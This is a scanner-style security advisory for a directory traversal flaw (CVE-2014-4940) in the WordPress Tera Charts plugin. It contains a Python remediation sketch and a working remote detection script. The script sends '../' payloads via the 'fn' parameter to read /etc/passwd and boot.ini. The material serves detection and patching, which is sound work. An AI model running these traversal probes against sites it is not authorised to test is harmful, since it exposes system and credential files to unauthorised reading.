Summary
This host is installed with the WordPress Tera Charts plugin
and is prone to multiple directory traversal vulnerabilities.
Impact
Successful exploitation will allow remote, unauthenticated
attackers to read and download arbitrary files that the web server process can access.
Impact Level: Application
Solution
Upgrade to version 1.0 or later.
For updates refer to https://wordpress.org/plugins/tera-charts
Insight
The flaw is due to the 'charts/treemap.php' and
'charts/zoomabletreemap.php' scripts not properly sanitizing user input supplied via the 'fn' parameter, which allows path traversal sequences (e.g. '../') to escape the intended directory.
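The following Python sketch is added here as an illustration; it is not code from the Tera Charts plugin (which is PHP). It models the pattern described above, where the 'fn' value is joined onto the chart data directory with no validation, next to a hardened resolver that accepts only a bare file name with an allowed extension and confirms the resolved path stays inside the directory. The directory CHARTS_DIR, the allowed extensions and the function names are assumptions for the example.

```python
import os

# Assumed data directory the chart scripts are meant to serve files from.
# The plugin's real layout is not documented on the page.
CHARTS_DIR = "/srv/wordpress/wp-content/plugins/tera-charts/charts/data"

# Assumed allow-list of chart data formats; anything else is rejected.
ALLOWED_SUFFIXES = {".json", ".csv"}


def resolve_unsafe(fn, base=CHARTS_DIR):
    """Path the flawed pattern ends up opening: 'fn' is joined onto the
    directory verbatim, so enough '../' segments walk out of it."""
    return os.path.normpath(os.path.join(base, fn))


def resolve_safe(fn, base=CHARTS_DIR):
    """Hardened resolver: returns the absolute path to open, or None if
    the request must be rejected.

    Checks, in order:
      1. non-empty and no NUL byte (NUL truncates paths in C-backed APIs);
      2. a bare file name only: no '/', no '\\' (PHP on Windows treats
         backslash as a separator), and not '.', '..' or empty;
      3. extension on the allow-list;
      4. the canonicalised target still lies under the canonicalised base,
         which also catches symlinks pointing outside the directory.
    """
    if not fn or "\x00" in fn or "\\" in fn:
        return None
    name = os.path.basename(fn)
    if name != fn or name in ("", ".", ".."):
        return None
    if os.path.splitext(name)[1].lower() not in ALLOWED_SUFFIXES:
        return None
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, name))
    if os.path.commonpath([base_real, target]) != base_real:
        return None
    return target


if __name__ == "__main__":
    payload = "../" * 8 + "etc/passwd"
    print("unsafe:", resolve_unsafe(payload))   # escapes to /etc/passwd
    print("safe:  ", resolve_safe(payload))     # None: rejected
    print("safe:  ", resolve_safe("sales.json"))
```

Note that the web server URL-decodes '%2e%2e%2f' before the script sees it, so the resolver must be applied to the decoded value; a double-encoded '%252e' only matters if the script decodes the parameter a second time itself.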
Affected
Wordpress Tera Charts plugin version 0.1
Detection
Send crafted data via an HTTP GET request
and check whether arbitrary files can be read.
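A remote check in the shape the Detection step describes, added here as an example rather than the scanner's own test logic. It builds one GET request per vulnerable script and target file, then looks for the file's actual contents in the response (a 'root:x:0:0:' line for /etc/passwd, a '[boot loader]' section for boot.ini) rather than for the payload string, which a PHP warning would echo back even when nothing was read. The plugin path, the traversal depth, the target files and the fetch callable are assumptions for the example; the fetch is injectable so the logic can be exercised offline.

```python
import re
from urllib.parse import urlencode
from urllib.request import Request, urlopen

# Scripts and parameter named in the advisory.
VULN_SCRIPTS = ("charts/treemap.php", "charts/zoomabletreemap.php")
PARAM = "fn"

# Assumed: the plugin lives at the default WordPress plugin location.
PLUGIN_PATH = "wp-content/plugins/tera-charts/"

# Files to request, each paired with evidence that the file itself was read.
TARGETS = (
    ("etc/passwd", re.compile(r"^root:[^:]*:0:0:", re.M)),
    ("boot.ini", re.compile(r"\[boot loader\]", re.I)),
)


def probe_urls(base_url, depth=10):
    """Build one GET URL per (script, target file) pair. Surplus '../'
    segments are harmless once the root is reached, so depth errs high."""
    root = base_url.rstrip("/") + "/"
    traversal = "../" * depth
    urls = []
    for script in VULN_SCRIPTS:
        for target, _ in TARGETS:
            query = urlencode({PARAM: traversal + target}, safe="/")
            urls.append(f"{root}{PLUGIN_PATH}{script}?{query}")
    return urls


def evidence_in(body):
    """Return the target file whose contents appear in body, else None."""
    for target, pattern in TARGETS:
        if pattern.search(body):
            return target
    return None


def http_fetch(url, timeout=10):
    """Default fetcher; only used when scanning a real host."""
    req = Request(url, headers={"User-Agent": "tera-charts-traversal-check"})
    with urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def check_host(base_url, fetch=http_fetch):
    """Return [(url, disclosed_file)] for every probe that leaked a file."""
    findings = []
    for url in probe_urls(base_url):
        try:
            body = fetch(url)
        except Exception:  # 404, timeout, connection refused: not a finding
            continue
        hit = evidence_in(body)
        if hit:
            findings.append((url, hit))
    return findings


if __name__ == "__main__":
    import sys
    for url, leaked in check_host(sys.argv[1] if len(sys.argv) > 1 else "http://localhost/"):
        print(f"VULNERABLE: {url} disclosed {leaked}")
```

Run it as `python3 check.py http://target/` against a host you are authorised to test; an empty result means neither script returned recognisable file contents, not that the plugin is absent.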
References
Severity
Classification
CVE: CVE-2014-4940
CVSS Base Score: 5.0
CVSS Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N